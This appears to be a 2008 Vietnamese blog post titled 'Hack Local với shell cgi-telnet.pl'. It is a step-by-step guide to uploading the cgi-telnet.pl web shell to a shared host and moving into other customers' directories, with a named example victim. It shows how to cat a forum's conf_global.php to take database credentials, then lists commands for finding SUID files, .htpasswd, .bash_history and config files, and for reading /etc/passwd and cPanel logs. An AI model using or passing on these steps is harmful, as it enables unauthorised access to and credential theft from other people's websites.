Jun 10, 2008
123 Views

Hack Local với shell cgi-telnet.pl

Written by

Điều kiện cần :

+Bạn cần phải up 1 file view.pl ( cgi-telnet.pl ) lên host mình để hack, chmod 775 nhé !

+ Các lệnh để hack :

ls -al : lệnh này để xem thông tin

cd : lệnh này dùng để chuyển thư mục

Cat : lệnh này dùng để xem info database

Thường, với bảo mật ko quá cao, bạn chỉ cần dùng 3 lệnh cơ bản này là đủ rôì nhé !!

+ Tiến hành :

Sau khi up lên host, bạn chạy con view.pl nhé , khi đó nó sẽ đưa lên 1 màn hình đen để hack , bạn nhập pass vào nhé …

+ sau khi nhập pass, bạn sẽ có đường dẫn là : [[email protected]ênweb/home/kc/public_html/cgi-bin] , đây là đường dẫn đầu tiên từ host của bạn , bạn dùng lệnh cd /home/ , khi đó đường dẫn sẽ là [[email protected]ênweb/home] , bạn dùng lệnh ls -al để xem tất cả các host đang ở cùng trên sever của bạn. vd như chúng ta sẽ hack host của hoangtudaumat , bạn tiếp tục dùng lệnh cd hoangtudaumat , khi đó sẽ có đường dẫn là : [[email protected]/home/hoangtudaumat/] , khi này , các bạn cần phải dùng lệnh chuyển đến public nhé , vẫn dùng lệnh : cd public_html , khi này , bạn đã có đường dẫn là [[email protected]/home/hoangtudaumat/public_html] , để xem các thư mục của public, bạn dùng lệnh ls -al nhé , khi này, các bạn sẽ thấy các tập tin như :forums . index.html …..

*** Bổ sung : Một hosting có cấu tạo thường là thư mục public_html sẽ chứa những gì “được hiện ra” trên web của victim , do đó bạn muốn tìm đến forum hay guessbook thì nên tìm tại đây . Nên tìm hiểu cấu trúc của hosting trước khi hack local **

Ðể hack , bạn tiếp tục dùng lệnh cd forum , khi đó , đường dẫn của bạn sẽ là [[email protected]/home/hoangtudaumat/public_html/forum] , bạn tiếp tục dùng lệnh ls -al để xem , các bạn sẽ thấy các file :conf_global.php , downloads_config.php …… , để xem thông tin của database , bạn dùng lệnh cat conf_global.php nhé , khi này, bạn đã giử được database ở trong tay rồi đấy ,

User database là $INFO[‘sql_database’]

Pass database là $INFO[‘sql_pass’]

sau đó muốn tìm hiểu nó có những cmd nào thì cứ type : help

muốn tìm hiếu sâu hơn : info …. vidụ tôi muốn hiểu ls là cái gì : info ls

đây là vài cmd mà hay dùng :

find
find / -type f -perm -04000 -ls : tìm tất cả suid file
find / -type f -perm -02000 -ls : tìm tất cả sgid files
find / -type f -name : tìm config.inc.php
find / -type f -name \”config*\ : tìm file config
find / -perm -2 -ls”), tìm file,folders cho phép ghi
find / -type f -name service.pwd :find all service.pwd files
find / -type f -name .htpasswd :find all .htpasswd files
find / -type f -name .bash_history,: find all .bash_history files
———————————————————
netstat -an | grep -i listen :show opened ports
netstat -an :show opened ports
————————————————
cat /etc/passwd :list user <+++ du`ng !
cat / etc/userdomains :View cpanel user-domains logs
cat /var/cpanel/accounting.log: View cpanel logs
cat /usr/local/apache/conf/httpd.conf : Aache configuration
cat /etc/httpd.conf :Apache configuration
cat /etc/syslog.conf :Syslog configuration
cat /etc/motd :Message Of The Day

Article Tags:
· · ·
Article Categories:
Bug & Security
    http://linholiver.com

    https://linholiver.com/diary/about/